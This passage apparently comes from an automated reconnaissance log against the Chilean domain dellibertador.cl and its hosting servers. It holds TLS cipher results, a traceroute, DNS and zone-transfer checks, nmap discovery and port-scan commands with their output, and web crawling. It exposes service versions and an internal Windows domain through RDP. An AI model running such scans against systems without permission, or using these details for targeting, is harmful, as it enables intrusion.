603 Forward Secrecy OK - Supported
604 RC4 OK - Not Supported
605
606 Preferred:
607 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
608 Accepted:
609 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
610 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
611 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
612 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
613 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
614 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
615
616 * TLS 1.2 Session Resumption Support:
617 With Session IDs: NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
618 With TLS Tickets: OK - Supported
619
620 * Session Renegotiation:
621 Client-initiated Renegotiation: OK - Rejected
622 Secure Renegotiation: OK - Supported
623
624 * TLSV1_2 Cipher Suites:
625 Forward Secrecy OK - Supported
626 RC4 OK - Not Supported
627
628 Preferred:
629 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
630 Accepted:
631 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 256 bits HTTP 200 OK
632 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
633 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 128 bits HTTP 200 OK
634 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
635 TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
636 TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
637 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
638 TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
639 TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
640 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
641 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 256 bits HTTP 200 OK
642 TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 256 bits HTTP 200 OK
643 TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 128 bits HTTP 200 OK
644 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
645 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
646 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
647 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
648 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
649 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
650 RSA_WITH_AES_256_CCM_8 256 bits HTTP 200 OK
651 RSA_WITH_AES_256_CCM 256 bits HTTP 200 OK
652 RSA_WITH_AES_128_CCM_8 128 bits HTTP 200 OK
653 RSA_WITH_AES_128_CCM 128 bits HTTP 200 OK
654 ECDHE-ARIA256-GCM-SHA384 256 bits HTTP 200 OK
655 ECDHE-ARIA128-GCM-SHA256 128 bits HTTP 200 OK
656 ARIA256-GCM-SHA384 256 bits HTTP 200 OK
657 ARIA128-GCM-SHA256 128 bits HTTP 200 OK
658
659 * Deflate Compression:
660 OK - Compression disabled
661
662 * Downgrade Attacks:
663 TLS_FALLBACK_SCSV: OK - Supported
664
665 * SSLV2 Cipher Suites:
666 Server rejected all cipher suites.
667
668 * TLSV1_3 Cipher Suites:
669 Server rejected all cipher suites.
670
671 * SSLV3 Cipher Suites:
672 Server rejected all cipher suites.
673
674 * ROBOT Attack:
675 OK - Not vulnerable
676
677
678 SCAN COMPLETED IN 45.59 S
679 -------------------------
680#####################################################################################################################################
681traceroute to www.dellibertador.cl (200.54.230.247), 30 hops max, 60 byte packets
682 1 _gateway (10.202.5.1) 124.334 ms 124.307 ms 124.284 ms
683 2 unn-84-17-52-126.cdn77.com (84.17.52.126) 124.261 ms 124.238 ms 124.215 ms
684 3 hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129) 124.193 ms 124.158 ms 124.132 ms
685 4 be3591.ccr51.zrh02.atlas.cogentco.com (130.117.50.182) 237.029 ms 237.032 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150) 124.062 ms
686 5 be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62) 237.044 ms be3072.ccr21.muc03.atlas.cogentco.com (130.117.0.18) 237.021 ms 236.962 ms
687 6 be2959.ccr41.fra03.atlas.cogentco.com (154.54.36.53) 236.988 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253) 158.605 ms be2959.ccr41.fra03.atlas.cogentco.com (154.54.36.53) 158.559 ms
688 7 be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2) 158.563 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117) 158.537 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2) 158.511 ms
689 8 telefonica.fra03.atlas.cogentco.com (130.117.14.118) 158.433 ms 158.386 ms 158.371 ms
690 9 176.52.248.217 (176.52.248.217) 230.045 ms 176.52.248.230 (176.52.248.230) 230.012 ms 176.52.248.119 (176.52.248.119) 229.641 ms
69110 5.53.5.211 (5.53.5.211) 347.053 ms 94.142.119.235 (94.142.119.235) 347.010 ms *
69211 176.52.248.54 (176.52.248.54) 463.969 ms 94.142.116.84 (94.142.116.84) 463.936 ms 176.52.248.54 (176.52.248.54) 415.533 ms
69312 176.52.252.175 (176.52.252.175) 415.582 ms 5.53.0.215 (5.53.0.215) 415.450 ms 176.52.252.175 (176.52.252.175) 415.568 ms
69413 * * *
69514 nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6) 415.444 ms 415.472 ms 415.538 ms
69615 pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118) 441.740 ms 441.684 ms 441.640 ms
69716 * * *
69817 * * *
69918 plesk.tdata.cloud (200.54.230.247) 570.209 ms !X 570.142 ms !X 570.205 ms !X
700#####################################################################################################################################
701
702Domains still to check: 1
703 Checking if the hostname dellibertador.cl. given is in fact a domain...
704
705Analyzing domain: dellibertador.cl.
706 Checking NameServers using system default resolver...
707 IP: 200.54.230.247 (Chile)
708 HostName: ns.dellibertador.cl Type: NS
709 HostName: plesk.tdata.cloud Type: PTR
710 IP: 200.7.5.7 (Chile)
711 HostName: secundario.nic.cl Type: NS
712 HostName: secundario.nic.cl Type: PTR
713
714 Checking MailServers using system default resolver...
715 IP: 200.54.230.252 (Chile)
716 HostName: magic-02.tdata.cloud Type: MX
717 HostName: magic-02.tdata.cloud Type: PTR
718 IP: 200.54.230.251 (Chile)
719 HostName: magic-01.tdata.cloud Type: MX
720 HostName: magic-01.tdata.cloud Type: PTR
721
722 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
723 No zone transfer found on nameserver 200.7.5.7
724 No zone transfer found on nameserver 200.54.230.247
725
726 Checking SPF record...
727 No SPF record
728
729 Checking 192 most common hostnames using system default resolver...
730 IP: 200.54.230.247 (Chile)
731 HostName: ns.dellibertador.cl Type: NS
732 HostName: plesk.tdata.cloud Type: PTR
733 HostName: www.dellibertador.cl. Type: A
734 IP: 200.54.230.247 (Chile)
735 HostName: ns.dellibertador.cl Type: NS
736 HostName: plesk.tdata.cloud Type: PTR
737 HostName: www.dellibertador.cl. Type: A
738 HostName: ftp.dellibertador.cl. Type: A
739 IP: 200.54.230.247 (Chile)
740 HostName: ns.dellibertador.cl Type: NS
741 HostName: plesk.tdata.cloud Type: PTR
742 HostName: www.dellibertador.cl. Type: A
743 HostName: ftp.dellibertador.cl. Type: A
744 HostName: mail.dellibertador.cl. Type: A
745 IP: 200.54.230.247 (Chile)
746 HostName: ns.dellibertador.cl Type: NS
747 HostName: plesk.tdata.cloud Type: PTR
748 HostName: www.dellibertador.cl. Type: A
749 HostName: ftp.dellibertador.cl. Type: A
750 HostName: mail.dellibertador.cl. Type: A
751 HostName: ns.dellibertador.cl. Type: A
752 IP: 200.54.230.247 (Chile)
753 HostName: ns.dellibertador.cl Type: NS
754 HostName: plesk.tdata.cloud Type: PTR
755 HostName: www.dellibertador.cl. Type: A
756 HostName: ftp.dellibertador.cl. Type: A
757 HostName: mail.dellibertador.cl. Type: A
758 HostName: ns.dellibertador.cl. Type: A
759 HostName: webmail.dellibertador.cl. Type: A
760
761 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
762 Checking netblock 200.7.5.0
763 Checking netblock 200.54.230.0
764
765 Searching for dellibertador.cl. emails in Google
766
767 Checking 4 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
768 Host 200.7.5.7 is up (echo-reply ttl 46)
769 Host 200.54.230.252 is up (syn-ack ttl 42)
770 Host 200.54.230.251 is up (syn-ack ttl 42)
771 Host 200.54.230.247 is up (syn-ack ttl 43)
772
773 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
774 Scanning ip 200.7.5.7 (secundario.nic.cl (PTR)):
775 53/tcp open domain syn-ack ttl 46 (unknown banner: BIND 9)
776 | dns-nsid:
777 | NSID: sec-blanco (7365632d626c616e636f)
778 | id.server: sec-blanco
779 |_ bind.version: BIND 9
780 | fingerprint-strings:
781 | DNSVersionBindReqTCP:
782 | version
783 | bind
784 |_ BIND 9
785 Scanning ip 200.54.230.252 (magic-02.tdata.cloud (PTR)):
786 25/tcp open smtp syn-ack ttl 42 Exim smtpd
787 | smtp-commands: magic-02.tdata.cloud Hello nmap.scanme.org [84.17.52.67], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
788 |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
789 | ssl-cert: Subject: commonName=mailcleaner/organizationName=MailCleaner/stateOrProvinceName=Vaud/countryName=CH
790 | Issuer: commonName=mailcleaner/organizationName=MailCleaner/stateOrProvinceName=Vaud/countryName=CH
791 | Public Key type: rsa
792 | Public Key bits: 1024
793 | Signature Algorithm: md5WithRSAEncryption
794 | Not valid before: 2007-01-12T10:04:42
795 | Not valid after: 2034-05-29T10:04:42
796 | MD5: 9538 8856 60b9 3192 64e0 ec2a 6b84 5b63
797 |_SHA-1: ef7c 297c cc5a 971d 8dcb dae9 ba62 f8ed f96c f3ea
798 |_ssl-date: TLS randomness does not represent time
799 3389/tcp open ms-wbt-server syn-ack ttl 106 Microsoft Terminal Services
800 | rdp-ntlm-info:
801 | Target_Name: GOREOHIGGINS
802 | NetBIOS_Domain_Name: GOREOHIGGINS
803 | NetBIOS_Computer_Name: TDATA-RD-01
804 | DNS_Domain_Name: goreohiggins.cl
805 | DNS_Computer_Name: tdata-rd-01.goreohiggins.cl
806 | DNS_Tree_Name: goreohiggins.cl
807 | Product_Version: 10.0.14393
808 |_ System_Time: 2020-03-12T20:44:42+00:00
809 | ssl-cert: Subject: commonName=tdata-rd-01.goreohiggins.cl
810 | Issuer: commonName=tdata-rd-01.goreohiggins.cl
811 | Public Key type: rsa
812 | Public Key bits: 2048
813 | Signature Algorithm: sha256WithRSAEncryption
814 | Not valid before: 2019-11-29T14:46:45
815 | Not valid after: 2020-05-30T14:46:45
816 | MD5: 836b a227 936d d44f 0978 fd47 7459 836b
817 |_SHA-1: ead1 5c03 26ce e9f8 68b8 eea9 f886 01d3 d39c 4178
818 |_ssl-date: 2020-03-12T20:44:47+00:00; -5s from scanner time.
819 Running (JUST GUESSING): Linux 3.X|4.X (90%)
820 OS Info: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
821 |_clock-skew: mean: -5s, deviation: 0s, median: -5s
822 Scanning ip 200.54.230.251 (magic-01.tdata.cloud (PTR)):
823 25/tcp open smtp syn-ack ttl 42 Exim smtpd
824 | smtp-commands: magic-02.tdata.cloud Hello nmap.scanme.org [84.17.52.67], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
825 |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
826 | ssl-cert: Subject: commonName=mailcleaner/organizationName=MailCleaner/stateOrProvinceName=Vaud/countryName=CH
827 | Issuer: commonName=mailcleaner/organizationName=MailCleaner/stateOrProvinceName=Vaud/countryName=CH
828 | Public Key type: rsa
829 | Public Key bits: 1024
830 | Signature Algorithm: md5WithRSAEncryption
831 | Not valid before: 2007-01-12T10:04:42
832 | Not valid after: 2034-05-29T10:04:42
833 | MD5: 9538 8856 60b9 3192 64e0 ec2a 6b84 5b63
834 |_SHA-1: ef7c 297c cc5a 971d 8dcb dae9 ba62 f8ed f96c f3ea
835 |_ssl-date: TLS randomness does not represent time
836 Running (JUST GUESSING): Linux 3.X|4.X (89%)
837 Scanning ip 200.54.230.247 (webmail.dellibertador.cl.):
838 21/tcp open ftp syn-ack ttl 43 ProFTPD
839 | ssl-cert: Subject: commonName=plesk.tdata.cloud
840 | Subject Alternative Name: DNS:plesk.tdata.cloud
841 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
842 | Public Key type: rsa
843 | Public Key bits: 2048
844 | Signature Algorithm: sha256WithRSAEncryption
845 | Not valid before: 2020-01-28T15:44:32
846 | Not valid after: 2020-04-27T15:44:32
847 | MD5: 5d90 a140 df99 3a53 7a93 d5d5 e65f 5048
848 |_SHA-1: 70b9 0399 6aeb dd28 4a52 f213 1ea1 7dea 8587 d085
849 |_ssl-date: TLS randomness does not represent time
850 | tls-alpn:
851 |_ ftp
852 | tls-nextprotoneg:
853 |_ ftp
854 22/tcp open ssh syn-ack ttl 43 OpenSSH 7.4 (protocol 2.0)
855 | ssh-hostkey:
856 | 2048 a2:d5:9a:d1:54:5e:c6:d6:73:ff:76:5b:77:30:88:90 (RSA)
857 | 256 6a:1d:91:55:77:cb:45:e2:a4:90:53:35:d4:d0:36:7f (ECDSA)
858 |_ 256 68:99:17:75:71:2b:70:19:1b:0a:b3:45:38:da:71:63 (ED25519)
859 25/tcp open smtp syn-ack ttl 43 Postfix smtpd
860 |_smtp-commands: plesk.tdata.cloud, PIPELINING, SIZE 42188800, ETRN, STARTTLS, AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
861 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
862 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
863 | Public Key type: rsa
864 | Public Key bits: 2048
865 | Signature Algorithm: sha256WithRSAEncryption
866 | Not valid before: 2019-11-29T14:59:31
867 | Not valid after: 2020-11-28T14:59:31
868 | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
869 |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
870 |_ssl-date: TLS randomness does not represent time
871 53/tcp open domain syn-ack ttl 43 (unknown banner: none)
872 | dns-nsid:
873 |_ bind.version: none
874 | fingerprint-strings:
875 | DNSVersionBindReqTCP:
876 | version
877 | bind
878 |_ none
879 80/tcp open http syn-ack ttl 43 nginx
880 |_http-favicon: Parallels Plesk
881 | http-methods:
882 |_ Supported Methods: GET HEAD POST OPTIONS
883 |_http-title: Web Server's Default Page
884 110/tcp open pop3 syn-ack ttl 43 Dovecot pop3d
885 |_pop3-capabilities: SASL(PLAIN LOGIN CRAM-MD5) TOP RESP-CODES USER AUTH-RESP-CODE APOP STLS CAPA PIPELINING UIDL
886 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
887 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
888 | Public Key type: rsa
889 | Public Key bits: 2048
890 | Signature Algorithm: sha256WithRSAEncryption
891 | Not valid before: 2019-11-29T14:59:31
892 | Not valid after: 2020-11-28T14:59:31
893 | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
894 |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
895 |_ssl-date: TLS randomness does not represent time
896 143/tcp open imap syn-ack ttl 43 Dovecot imapd
897 |_imap-capabilities: more LITERAL+ ENABLE post-login LOGIN-REFERRALS STARTTLS ID IDLE capabilities SASL-IR OK have AUTH=PLAIN listed AUTH=LOGIN AUTH=CRAM-MD5A0001 Pre-login IMAP4rev1
898 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
899 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
900 | Public Key type: rsa
901 | Public Key bits: 2048
902 | Signature Algorithm: sha256WithRSAEncryption
903 | Not valid before: 2019-11-29T14:59:31
904 | Not valid after: 2020-11-28T14:59:31
905 | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
906 |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
907 |_ssl-date: TLS randomness does not represent time
908 443/tcp open ssl/http syn-ack ttl 43 nginx
909 |_http-favicon: Parallels Plesk
910 | http-methods:
911 |_ Supported Methods: GET HEAD POST OPTIONS
912 | http-robots.txt: 1 disallowed entry
913 |_/
914 |_http-title: Plesk Obsidian 18.0.24
915 | ssl-cert: Subject: commonName=plesk.tdata.cloud
916 | Subject Alternative Name: DNS:plesk.tdata.cloud
917 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
918 | Public Key type: rsa
919 | Public Key bits: 2048
920 | Signature Algorithm: sha256WithRSAEncryption
921 | Not valid before: 2020-01-28T15:44:32
922 | Not valid after: 2020-04-27T15:44:32
923 | MD5: 5d90 a140 df99 3a53 7a93 d5d5 e65f 5048
924 |_SHA-1: 70b9 0399 6aeb dd28 4a52 f213 1ea1 7dea 8587 d085
925 |_ssl-date: TLS randomness does not represent time
926 | tls-alpn:
927 | h2
928 |_ http/1.1
929 | tls-nextprotoneg:
930 | h2
931 |_ http/1.1
932 465/tcp open ssl/smtp syn-ack ttl 43 Postfix smtpd
933 |_smtp-commands: Couldn't establish connection on port 465
934 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
935 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
936 | Public Key type: rsa
937 | Public Key bits: 2048
938 | Signature Algorithm: sha256WithRSAEncryption
939 | Not valid before: 2019-11-29T14:59:31
940 | Not valid after: 2020-11-28T14:59:31
941 | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
942 |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
943 |_ssl-date: TLS randomness does not represent time
944 587/tcp open smtp syn-ack ttl 43 Postfix smtpd
945 |_smtp-commands: plesk.tdata.cloud, PIPELINING, SIZE 42188800, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
946 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
947 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
948 | Public Key type: rsa
949 | Public Key bits: 2048
950 | Signature Algorithm: sha256WithRSAEncryption
951 | Not valid before: 2019-11-29T14:59:31
952 | Not valid after: 2020-11-28T14:59:31
953 | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
954 |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
955 |_ssl-date: TLS randomness does not represent time
956 993/tcp open ssl/imap syn-ack ttl 43 Dovecot imapd
957 |_imap-capabilities: more LITERAL+ ENABLE post-login IMAP4rev1 ID IDLE capabilities SASL-IR OK have listed LOGIN-REFERRALS AUTH=LOGIN AUTH=CRAM-MD5A0001 Pre-login AUTH=PLAIN
958 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
959 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
960 | Public Key type: rsa
961 | Public Key bits: 2048
962 | Signature Algorithm: sha256WithRSAEncryption
963 | Not valid before: 2019-11-29T14:59:31
964 | Not valid after: 2020-11-28T14:59:31
965 | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
966 |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
967 |_ssl-date: TLS randomness does not represent time
968 995/tcp open ssl/pop3 syn-ack ttl 43 Dovecot pop3d
969 |_pop3-capabilities: SASL(PLAIN LOGIN CRAM-MD5) TOP RESP-CODES USER AUTH-RESP-CODE APOP CAPA PIPELINING UIDL
970 | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
971 | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
972 | Public Key type: rsa
973 | Public Key bits: 2048
974 | Signature Algorithm: sha256WithRSAEncryption
975 | Not valid before: 2019-11-29T14:59:31
976 | Not valid after: 2020-11-28T14:59:31
977 | MD5: babc 16d9 4021 fb22 57a5 2301 44d2 fdda
978 |_SHA-1: 7f64 9622 dea4 817d a3b9 53a8 4814 b084 2c61 38ff
979 |_ssl-date: TLS randomness does not represent time
980 8443/tcp open ssl/https-alt syn-ack ttl 43 sw-cp-server
981 | fingerprint-strings:
982 | GetRequest:
983 | HTTP/1.1 200 OK
984 | Server: sw-cp-server
985 | Date: Thu, 12 Mar 2020 20:46:01 GMT
986 | Content-Type: text/html; charset=UTF-8
987 | Connection: close
988 | Expires: Fri, 28 May 1999 00:00:00 GMT
989 | Last-Modified: Thu, 12 Mar 2020 20:46:01 GMT
990 | Cache-Control: no-store, no-cache, must-revalidate
991 | Cache-Control: post-check=0, pre-check=0
992 | Pragma: no-cache
993 | P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
994 | X-Frame-Options: SAMEORIGIN
995 | X-XSS-Protection: 1; mode=block
996 | <html><head>
997 | <meta charset="utf-8">
998 | <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
999 | <meta name="plesk-build" content="1800200215.00">
1000 | <title>Plesk Obsidian 18.0.24</title>
1001 | <script language="javascript" type="text/javascript" src="/cp/javascript/externals/prototype.js?1581675273"/></script>
1002 | </head><body onLoad=";top.location='/login.php?success_redirect_url=%2F';"></b
1003 | HTTPOptions:
1004 | HTTP/1.1 405 Not Allowed
1005 | Server: sw-cp-server
1006 | Date: Thu, 12 Mar 2020 20:46:03 GMT
1007 | Content-Type: text/html
1008 | Content-Length: 929
1009 | Connection: close
1010 | ETag: "5e46d8aa-3a1"
1011 | <!DOCTYPE html>
1012 | <html lang="en" dir="ltr">
1013 | <head>
1014 | <meta charset="utf-8">
1015 | <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
1016 | <title>405 Method Not Allowed</title>
1017 | <link rel="shortcut icon" href="/favicon.ico">
1018 | <link rel="stylesheet" href="/ui-library/plesk-ui-library.css?3.5.0">
1019 | <script type="text/javascript" src="/ui-library/plesk-ui-library.min.js?3.5.0"></script>
1020 | <script type="text/javascript" src="/cp/javascript/vendors.js"></script>
1021 | <script type="text/javascript" src="/cp/javascript/main.js"></script>
1022 | <script type="text/javascript" src="/error_docs/uat.js?v1"></script>
1023 | <link href="/error_docs/app.css" rel="stylesheet"></head>
1024 | <body>
1025 |_ <div id="
1026 | http-methods:
1027 |_ Supported Methods: GET HEAD POST OPTIONS
1028 | http-robots.txt: 1 disallowed entry
1029 |_/
1030 |_http-server-header: sw-cp-server
1031 |_http-title: Plesk Obsidian 18.0.24
1032 | ssl-cert: Subject: commonName=plesk.tdata.cloud
1033 | Subject Alternative Name: DNS:plesk.tdata.cloud
1034 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
1035 | Public Key type: rsa
1036 | Public Key bits: 2048
1037 | Signature Algorithm: sha256WithRSAEncryption
1038 | Not valid before: 2020-01-28T15:44:32
1039 | Not valid after: 2020-04-27T15:44:32
1040 | MD5: 5d90 a140 df99 3a53 7a93 d5d5 e65f 5048
1041 |_SHA-1: 70b9 0399 6aeb dd28 4a52 f213 1ea1 7dea 8587 d085
1042 |_ssl-date: TLS randomness does not represent time
1043 | tls-alpn:
1044 |_ http/1.1
1045 | tls-nextprotoneg:
1046 |_ http/1.1
1047 OS Info: Service Info: Hosts: plesk.tdata.cloud, plesk.tdata.cloud
1048 WebCrawling domain's web servers... up to 50 max links.
1049
1050 + URL to crawl: http://mail.dellibertador.cl.
1051 + Date: 2020-03-12
1052
1053 + Crawling URL: http://mail.dellibertador.cl.:
1054 + Links:
1055 + Crawling http://mail.dellibertador.cl.
1056 + Crawling http://mail.dellibertador.cl./fonts/lato-v16-latin-regular.woff2
1057 + Crawling http://mail.dellibertador.cl./img/logo.svg (File! Not crawling it.)
1058 + Crawling http://mail.dellibertador.cl./img/plesk-guides.svg (File! Not crawling it.)
1059 + Crawling http://mail.dellibertador.cl./img/knowlede-base.svg (File! Not crawling it.)
1060 + Crawling http://mail.dellibertador.cl./img/forum.svg (File! Not crawling it.)
1061 + Crawling http://mail.dellibertador.cl./img/developers-blog.svg (File! Not crawling it.)
1062 + Crawling http://mail.dellibertador.cl./img/video-guides.svg (File! Not crawling it.)
1063 + Crawling http://mail.dellibertador.cl./img/facebook.svg (File! Not crawling it.)
1064 + Searching for directories...
1065 - Found: http://mail.dellibertador.cl./img/
1066 + Searching open folders...
1067 - http://mail.dellibertador.cl./img/ (403 Forbidden)
1068
1069
1070 + URL to crawl: http://ns.dellibertador.cl
1071 + Date: 2020-03-12
1072
1073 + Crawling URL: http://ns.dellibertador.cl:
1074 + Links:
1075 + Crawling http://ns.dellibertador.cl
1076 + Crawling http://ns.dellibertador.cl/fonts/lato-v16-latin-regular.woff2
1077 + Crawling http://ns.dellibertador.cl/img/logo.svg (File! Not crawling it.)
1078 + Crawling http://ns.dellibertador.cl/img/plesk-guides.svg (File! Not crawling it.)
1079 + Crawling http://ns.dellibertador.cl/img/knowlede-base.svg (File! Not crawling it.)
1080 + Crawling http://ns.dellibertador.cl/img/forum.svg (File! Not crawling it.)
1081 + Crawling http://ns.dellibertador.cl/img/developers-blog.svg (File! Not crawling it.)
1082 + Crawling http://ns.dellibertador.cl/img/video-guides.svg (File! Not crawling it.)
1083 + Crawling http://ns.dellibertador.cl/img/facebook.svg (File! Not crawling it.)
1084 + Searching for directories...
1085 - Found: http://ns.dellibertador.cl/img/
1086 + Searching open folders...
1087 - http://ns.dellibertador.cl/img/ (403 Forbidden)
1088
1089
1090 + URL to crawl: http://ns.dellibertador.cl.
1091 + Date: 2020-03-12
1092
1093 + Crawling URL: http://ns.dellibertador.cl.:
1094 + Links:
1095 + Crawling http://ns.dellibertador.cl.
1096 + Crawling http://ns.dellibertador.cl./fonts/lato-v16-latin-regular.woff2
1097 + Crawling http://ns.dellibertador.cl./img/logo.svg (File! Not crawling it.)
1098 + Crawling http://ns.dellibertador.cl./img/plesk-guides.svg (File! Not crawling it.)
1099 + Crawling http://ns.dellibertador.cl./img/knowlede-base.svg (File! Not crawling it.)
1100 + Crawling http://ns.dellibertador.cl./img/forum.svg (File! Not crawling it.)
1101 + Crawling http://ns.dellibertador.cl./img/developers-blog.svg (File! Not crawling it.)
1102 + Crawling http://ns.dellibertador.cl./img/video-guides.svg (File! Not crawling it.)
1103 + Crawling http://ns.dellibertador.cl./img/facebook.svg (File! Not crawling it.)
1104 + Searching for directories...
1105 - Found: http://ns.dellibertador.cl./img/
1106 + Searching open folders...
1107 - http://ns.dellibertador.cl./img/ (403 Forbidden)
1108
1109
1110 + URL to crawl: http://webmail.dellibertador.cl.
1111 + Date: 2020-03-12
1112
1113 + Crawling URL: http://webmail.dellibertador.cl.:
1114 + Links:
1115 + Crawling http://webmail.dellibertador.cl.
1116 + Crawling http://webmail.dellibertador.cl./fonts/lato-v16-latin-regular.woff2
1117 + Crawling http://webmail.dellibertador.cl./img/logo.svg (File! Not crawling it.)
1118 + Crawling http://webmail.dellibertador.cl./img/plesk-guides.svg (File! Not crawling it.)
1119 + Crawling http://webmail.dellibertador.cl./img/knowlede-base.svg (File! Not crawling it.)
1120 + Crawling http://webmail.dellibertador.cl./img/forum.svg (File! Not crawling it.)
1121 + Crawling http://webmail.dellibertador.cl./img/developers-blog.svg (File! Not crawling it.)
1122 + Crawling http://webmail.dellibertador.cl./img/video-guides.svg (File! Not crawling it.)
1123 + Crawling http://webmail.dellibertador.cl./img/facebook.svg (File! Not crawling it.)
1124 + Searching for directories...
1125 - Found: http://webmail.dellibertador.cl./img/
1126 + Searching open folders...
1127 - http://webmail.dellibertador.cl./img/ (403 Forbidden)
1128
1129
1130 + URL to crawl: http://www.dellibertador.cl.
1131 + Date: 2020-03-12
1132
1133 + Crawling URL: http://www.dellibertador.cl.:
1134 + Links:
1135 + Crawling http://www.dellibertador.cl. (REDIRECTING TO: https://www.dellibertador.cl/d3/)
1136 + Searching for directories...
1137 + Searching open folders...
1138
1139
1140 + URL to crawl: http://ftp.dellibertador.cl.
1141 + Date: 2020-03-12
1142
1143 + Crawling URL: http://ftp.dellibertador.cl.:
1144 + Links:
1145 + Crawling http://ftp.dellibertador.cl.
1146 + Crawling http://ftp.dellibertador.cl./fonts/lato-v16-latin-regular.woff2
1147 + Crawling http://ftp.dellibertador.cl./img/logo.svg (File! Not crawling it.)
